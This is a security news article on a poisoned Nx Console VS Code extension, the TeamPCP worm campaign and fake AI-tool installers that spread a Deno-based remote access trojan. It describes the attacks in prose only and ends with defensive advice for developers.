Poisoned VS Code extensions and the new GitHub attack surface
Poisoned VS Code extensions and fake AI installers are attack techniques where malicious or compromised tools are distributed through trusted developer channels like GitHub and official marketplaces, allowing attackers to hijack software supply chains, steal credentials, and plant remote access malware directly in developers’ workflows. The breach GitHub confirmed on May 20 illustrates how powerful this vector has become: a single compromised VS Code extension on one employee’s machine gave attackers access to roughly 3,800 internal repositories. The extension, Nx Console, was a widely used developer tool with 2.2 million installs and was live in a malicious form on the Visual Studio Marketplace for about 18 minutes, yet that small window was enough. Instead of breaking in through a traditional exploit, the attackers turned a trusted update mechanism into their entry point, highlighting why VS Code extension security must be treated as a core part of modern DevSecOps.
Inside the Nx Console supply chain compromise and TeamPCP’s worm
The Nx Console incident was not an isolated mishap but one wave in a broader campaign by the threat group known as TeamPCP, tracked by Google’s Threat Intelligence Group as UNC6780. According to research from Trend Micro, StepSecurity, and Snyk, the group’s Mini Shai-Hulud worm has driven at least seven confirmed supply chain waves since March, hitting tools like Trivy, Checkmarx KICS, LiteLLM, Bitwarden CLI, TanStack, and Mistral before reaching GitHub itself. The worm automates GitHub supply chain attacks by stealing CI/CD credentials and publishing malware in developer tools, then rapidly iterating on payloads. Palo Alto Networks’ Unit 42 observed three payload versions shipped within hours, with one script replaced only two hours after the first release. Mini Shai-Hulud now calls Fulcio and Rekor at runtime to generate valid Sigstore certificates, so poisoned packages appear legitimate even as attackers control the entire build chain.
Fake ChatGPT and Claude installers delivering Deno RAT malware
Attackers are also abusing developer trust in AI tools through fake AI installers. On GitHub and SourceForge, counterfeit installers claim to provide access to ChatGPT, Claude, and even music production tools like AutoTune, Kontakt, Ableton Live, and ZENOLOGY, but instead deliver malware in developer tools. Malwarebytes reports that these projects lure victims from compromised YouTube channels where AI-generated videos promote the bogus downloads, with more than 50,000 views recorded. The infection chain relies on social engineering: users are told to paste a terminal command that installs Scoop and WinGet, then the legitimate Deno runtime. Deno is then used to pull the DinDoor backdoor from a remote server and execute it in memory. DinDoor establishes persistence, gathers system details, and loads a Deno-based remote access Trojan (RAT) previously tracked as Smokest, which can run commands, manage files, capture screenshots, and open SOCKS5 proxies for browser hijacking and crypto theft.
How these GitHub supply chain attacks compromise developers
Although the techniques differ, the poisoned VS Code extension and fake AI installers share a common strategy: they weaponize tools developers already depend on. In the Nx Console case, attackers rode the auto-update mechanism for a popular VS Code extension, turning a trusted marketplace into a delivery channel for a worm that spread through CI/CD systems and open-source ecosystems. In the Deno RAT campaigns, GitHub repositories and YouTube tutorials mimic legitimate AI workflows, transforming routine tasks—installing a ChatGPT or Claude client—into malware delivery. Both attack patterns exploit habits such as copy‑pasting shell commands, accepting default permissions, and assuming any popular GitHub project is safe. Once inside developer environments, they can steal credentials, push malicious package updates, and hijack browsers or crypto wallets, converting a single infected workstation into a distribution point for further GitHub supply chain attacks.
Practical defenses: securing VS Code extensions and AI tools
Developers cannot avoid modern tooling, but they can reduce the risk of malware in developer tools by tightening their personal and project security practices. Treat every VS Code extension and GitHub repository as untrusted until proven otherwise: verify the publisher, check commit history, compare checksums, and lock critical extensions to known-good versions instead of auto‑updating blindly. For AI-related software, avoid copy‑pasting commands from YouTube descriptions and only install clients and SDKs linked directly from official vendor sites. Practice strong account hygiene: enable multi-factor authentication for GitHub and extension marketplaces, use unique passwords, and monitor login history and OAuth app authorizations for anomalies. Finally, integrate security checks into your workflow—run dependency scanners, watch advisories for your tools, and respond quickly to suspicious activity. Securing VS Code extension security and AI toolchains is now a core part of defending both your code and your organization.